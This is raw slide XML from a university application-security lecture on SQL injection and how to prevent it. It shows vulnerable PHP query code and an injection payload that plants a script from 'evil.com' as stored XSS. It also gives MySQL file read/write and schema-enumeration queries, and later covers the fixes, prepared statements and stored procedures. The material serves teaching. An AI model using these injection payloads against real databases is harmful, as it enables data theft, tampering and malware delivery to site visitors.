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8" r:id="rId2"/>
    <p:sldId id="269" r:id="rId3"/>
    <p:sldId id="260" r:id="rId4"/>
    <p:sldId id="332" r:id="rId5"/>
    <p:sldId id="333" r:id="rId6"/>
    <p:sldId id="326" r:id="rId7"/>
    <p:sldId id="327" r:id="rId8"/>
    <p:sldId id="328" r:id="rId9"/>
    <p:sldId id="329" r:id="rId10"/>
    <p:sldId id="330" r:id="rId11"/>
    <p:sldId id="335" r:id="rId12"/>
    <p:sldId id="334" r:id="rId13"/>
    <p:sldId id="337" r:id="rId14"/>
    <p:sldId id="336" r:id="rId15"/>
    <p:sldId id="338" r:id="rId16"/>
    <p:sldId id="340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1" r:id="rId26"/>
    <p:sldId id="352" r:id="rId27"/>
    <p:sldId id="350" r:id="rId28"/>
    <p:sldId id="353" r:id="rId29"/>
    <p:sldId id="354" r:id="rId30"/>
    <p:sldId id="355" r:id="rId31"/>
    <p:sldId id="356" r:id="rId32"/>
    <p:sldId id="357" r:id="rId33"/>
    <p:sldId id="358" r:id="rId34"/>
    <p:sldId id="361" r:id="rId35"/>
    <p:sldId id="365" r:id="rId36"/>
    <p:sldId id="366" r:id="rId37"/>
    <p:sldId id="367" r:id="rId38"/>
    <p:sldId id="368" r:id="rId39"/>
    <p:sldId id="369" r:id="rId40"/>
    <p:sldId id="372" r:id="rId41"/>
    <p:sldId id="373" r:id="rId42"/>
    <p:sldId id="375" r:id="rId43"/>
    <p:sldId id="374" r:id="rId44"/>
    <p:sldId id="270" r:id="rId45"/>
    <p:sldId id="26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00"/>
    <a:srgbClr val="FF00FF"/>
    <a:srgbClr val="E6E6E6"/>
    <a:srgbClr val="E0E0E0"/>
    <a:srgbClr val="133C5D"/>
    <a:srgbClr val="131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9" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="102" d="100"/>
          <a:sy n="102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66F15-64CE-44F6-AF51-8F568C022106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05D92-3DF3-46AE-AA3E-E4F00EDCE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343F-1CE6-4DBC-81D0-0B6C4F0D4CEA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7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9297-094B-4D43-A2BC-251F70F7FAC6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8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1244-2662-4920-9F2A-89027007E985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8C-CA03-417A-BB11-4581E88297A7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CE42-88DE-4DAE-BEE6-F990EFC56C39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648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648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1E9-EBCB-4F75-92F3-F2DCBCACB9FA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2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0188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1"/>
            <a:ext cx="4041775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2E2A-7803-4D06-A8B8-49F1F33489B9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5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B316-30AA-4DF3-9FF0-A99B6D420566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9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D29-E6DC-41B0-9328-87E0347E6B3D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4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94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0766-FF88-4569-AE43-2DC25C757AC3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0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5A12-29E9-4A8B-BF11-BE0A3FC00240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3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648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AD201-9091-4BC7-8645-E6644BE2C723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6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Blind_SQL_Inject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ISEC 400 Application Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Week </a:t>
            </a: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Copyright © 2013 Todd Whittaker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(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todd.whittaker@franklin.edu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An attack against confidentiality, integrity, and availability of everything in your database.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581400" y="3275038"/>
            <a:ext cx="1295400" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50515"/>
              <a:gd name="adj2" fmla="val -202404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3256380"/>
            <a:ext cx="2438400" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -17259"/>
              <a:gd name="adj2" fmla="val -198322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43000" y="3275038"/>
            <a:ext cx="2209800" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -27393"/>
              <a:gd name="adj2" fmla="val -145261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DROP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5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An attack against confidentiality, integrity, and availability of everything in your database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not just limited to strings with quotes.  Numbers don’t need to be quoted, for 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191000"/>
            <a:ext cx="8213436" cy="1064492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uid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$_REQUEST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userid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]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sql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SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>usertable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WHERE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uid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=$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>uid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;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";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$results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$conn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query($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sql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765636" y="4953000"/>
            <a:ext cx="1981200" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -73545"/>
              <a:gd name="adj2" fmla="val -68014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No quotes needed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9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Can be used as a vector for stored XSS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955" y="2514600"/>
            <a:ext cx="8213436" cy="1293092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pwd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$_REQUEST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password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]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uid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$_REQUEST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userid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]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sql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UPDATE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usertable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 SET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pwd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='$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pwd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' WHERE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uid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='$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uid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';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";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$count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$conn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execute($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sql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828800" y="4343400"/>
            <a:ext cx="6096000" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5384"/>
              <a:gd name="adj2" fmla="val -108976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Submit a password of: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WHERE 0=1; UPDATE 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usertable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SET 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=CONCAT(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'&lt;script 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="http://evil.com/evil.js" /&gt;'); --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0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Can be used as a vector for stored XSS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955" y="2514600"/>
            <a:ext cx="8213436" cy="1293092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pwd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$_REQUEST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password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]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uid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$_REQUEST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userid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]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sql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UPDATE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usertable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 SET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pwd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='$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pwd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' WHERE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uid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='$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uid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';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";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$count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$conn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execute($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sql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828800" y="4343400"/>
            <a:ext cx="6096000" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5384"/>
              <a:gd name="adj2" fmla="val -108976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Submit a password of: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WHERE 0=1; UPDATE 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usertable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SET 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=CONCAT(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'&lt;script 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="http://evil.com/evil.js" /&gt;'); --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96" y="1676400"/>
            <a:ext cx="6825954" cy="333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42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Can be combined with command injection, depending on the database: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1486" y="2895600"/>
            <a:ext cx="7162800" cy="16002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468465"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/* Write an arbitrary file */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SELECT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6F6F6F"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"text"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INTO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OUTFILE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6F6F6F"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"file.txt"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468465"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/* Read an arbitrary file */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SELECT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3F5FBF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>load_file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6F6F6F"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"PATH_TO_FILE"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);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6324600"/>
            <a:ext cx="5932714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 http://www.greensql.com/article/protect-yourself-sqli-attacks-create-backdoor-web-server-using-mysql</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3350728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Can be combined with command injection, depending on the database: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1486" y="2895600"/>
            <a:ext cx="7162800" cy="16002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468465"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/* Write an arbitrary file */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SELECT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6F6F6F"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"text"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INTO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OUTFILE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6F6F6F"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"file.txt"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468465"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/* Read an arbitrary file */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SELECT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3F5FBF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>load_file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6F6F6F"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"PATH_TO_FILE"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);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6324600"/>
            <a:ext cx="5932714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 http://www.greensql.com/article/protect-yourself-sqli-attacks-create-backdoor-web-server-using-mysql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200400" y="4708848"/>
            <a:ext cx="5257800" cy="1768151"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1678"/>
              <a:gd name="adj2" fmla="val -112670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If you can do this (e.g. via MySQL), you can read and write arbitrary files on the system.  So, write a file “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” and upload it to do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whatever you want!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334000" y="1143000"/>
            <a:ext cx="3352800" cy="1463352"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -29769"/>
              <a:gd name="adj2" fmla="val 92644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xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is a similar weakness under MS SQL Server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7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Most databases have commands to extract the complete table structure (MySQL below)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1486" y="2895600"/>
            <a:ext cx="7162800" cy="24384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468465"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/* Find all the databases */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SELECT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3F5FBF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>DATABASE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468465"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/* Show all the tables in the database */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SHOW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TABLES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468465"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/* Show the structure of a table */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DESCRIBE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users;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324600"/>
            <a:ext cx="5932714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dirty="0"/>
              <a:t>Source http://dev.mysql.com/doc/refman/5.0/en/getting-information.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221121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Most databases have commands to extract the complete table structure (MySQL below)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1486" y="2895600"/>
            <a:ext cx="7162800" cy="24384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468465"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/* Find all the databases */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SELECT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3F5FBF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>DATABASE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468465"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/* Show all the tables in the database */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SHOW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TABLES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468465"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/* Show the structure of a table */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DESCRIBE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users;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324600"/>
            <a:ext cx="5932714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dirty="0"/>
              <a:t>Source http://dev.mysql.com/doc/refman/5.0/en/getting-information.html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553339" y="5021424"/>
            <a:ext cx="3951514" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2386"/>
              <a:gd name="adj2" fmla="val -98492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Injecting this lets you stop guessing and write the right other injections.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2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Errors and default configuration give too much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" y="2819400"/>
            <a:ext cx="4886325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524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Errors and default configuration give too much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" y="2819400"/>
            <a:ext cx="4886325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netbeans.org/images_www/articles/72/php/configure-php-environment-windows/xampp-phpinf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4384675" cy="4976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0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week’s expected outcomes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This week’s topics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This week’s homework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upcoming deadlines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Question &amp; answer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47CB-F391-4DAB-9FB4-A73A580B60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Blind injection: using application responses to make educated guesses about tables, structures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If an SQL error doesn’t generate an error page, but redirects to home, that’s a “bad guess.” (i.e. NO)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No SQL error redirecting to a correct page indicates a “good guess.” (i.e. YES)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Structure injections by playing “twenty questions” about names of tables, and fields.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Blind_SQL_Injection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96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Conclusion: SQL Injection puts your data, your business, and your customer’s PCs at tremendous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02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Solving SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad solution #1: disallow all strings that contain single quotes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem 1: Some people have names with quotes in them, like “Dolan O’Malley”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem 2: It only works against string injection fields, not number injection fields (that don’t need quotes)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34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Solving SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad solution #2: prevent common injections like “1=1”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem: “2=2” or “1&lt;2” works just as well to get those true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00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Solving SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad solution #3: create blacklists or whitelists using regular expressions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem 1: defining what bad data looks like is exceptionally difficult (see the “disallow quotes” issue)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem 2: defining what some good data looks like is easier for structured data like dates &amp; phone numbers.  Others (like names, addresses, email) are very hard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RegEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Denial of Service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ReDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>).  Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RegEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> implementations take exponential time to evaluate (for “poor” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RegExes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97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Solving SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad solution #3: create blacklists or whitelists using regular expressions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem 1: defining what bad data looks like is exceptionally difficult (see the “disallow quotes” issue)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem 2: defining what some good data looks like is easier for structured data like dates &amp; phone numbers.  Others (like names, addresses, email) are very hard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RegEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Denial of Service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ReDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>).  Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RegEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> implementations take exponential time to evaluate (for “poor” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RegExes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1143000"/>
            <a:ext cx="3657600" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -73126"/>
              <a:gd name="adj2" fmla="val 68593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A single missed pattern and you’re vulnerable again.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74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Solving SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad solution #3: create blacklists or whitelists using regular expressions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem 1: defining what bad data looks like is exceptionally difficult (see the “disallow quotes” issue)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem 2: defining what some good data looks like is easier for structured data like dates &amp; phone numbers.  Others (like names, addresses, email) are very hard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RegEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Denial of Service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ReDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>).  Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RegEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> implementations take exponential time to evaluate (for “poor” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RegExes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1143000"/>
            <a:ext cx="3657600" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -73126"/>
              <a:gd name="adj2" fmla="val 68593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A single missed pattern and you’re vulnerable again.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52800" y="1752600"/>
            <a:ext cx="4648200" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44810"/>
              <a:gd name="adj2" fmla="val 9050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e.g. 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([a-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-Z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]+)*/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vulnerable because of the repetition on inner and outer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subexpressions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.  Makes the combinations of paths exponential.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40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Solving SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reasonable solution #1: escaping of input prior to database access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Replace all single quote characters in user input with two single quote characters (e.g. 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dirty="0" smtClean="0"/>
              <a:t>” becomes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''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But, we also need to worry about “%” characters due to the “like” keyword, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use a vendor supplied escaping library.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51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Solving SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reasonable solution #2: use prepared statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Write queries with placeholders for user-supplied input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bind parameters to those placeholders using the language library.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581400"/>
            <a:ext cx="8213436" cy="23622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db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prepare(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INSERT INTO users (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firstName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,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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lastName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, email, password) VALUES (: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firstName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, :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lastName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,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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:email, :password)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bindParam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firstName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bindParam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lastName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lastName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bindParam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:email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$email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bindParam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:password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$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password)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execute()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6723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Solving SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reasonable solution #2: use prepared statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Write queries with placeholders for user-supplied input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bind parameters to those placeholders using the language library.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581400"/>
            <a:ext cx="8213436" cy="23622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db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prepare(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INSERT INTO users (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firstName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,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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lastName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, email, password) VALUES (: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firstName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, :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lastName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,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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:email, :password)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bindParam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firstName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bindParam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lastName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lastName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bindParam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:email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$email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bindParam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:password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$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password)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execute()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343400" y="1447800"/>
            <a:ext cx="3657600" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1109"/>
              <a:gd name="adj2" fmla="val 122083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Can also bind parameters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>positionally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> using “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2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” placeholders.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8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Demonstrate SQL injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Critique blacklist and whitelist approaches to preventing SQL injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mitigate SQL injection using prepared statements and database permissions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24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Solving SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reasonable solution #3: switch to using stored procedures.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43200"/>
            <a:ext cx="8213436" cy="33528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DELIMITER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//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CREATE PROCEDURE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create_user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(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   IN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="91246D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>fname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9FBF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>VARCHAR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(20),</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="91246D"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRP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   IN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lname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9FBF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>VARCHAR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(30),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mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F9FBF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>VARCHAR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(30),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passwd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9FBF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>VARCHAR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(512)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BEGIN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="91246D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INSERT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INTO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users (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lastName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email, password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VALUES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fname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lname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email, password);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//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350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Solving SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reasonable solution #3: switch to using stored procedures.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43200"/>
            <a:ext cx="8213436" cy="33528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DELIMITER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//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CREATE PROCEDURE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create_user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(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   IN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="91246D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>fname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9FBF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>VARCHAR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(20),</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
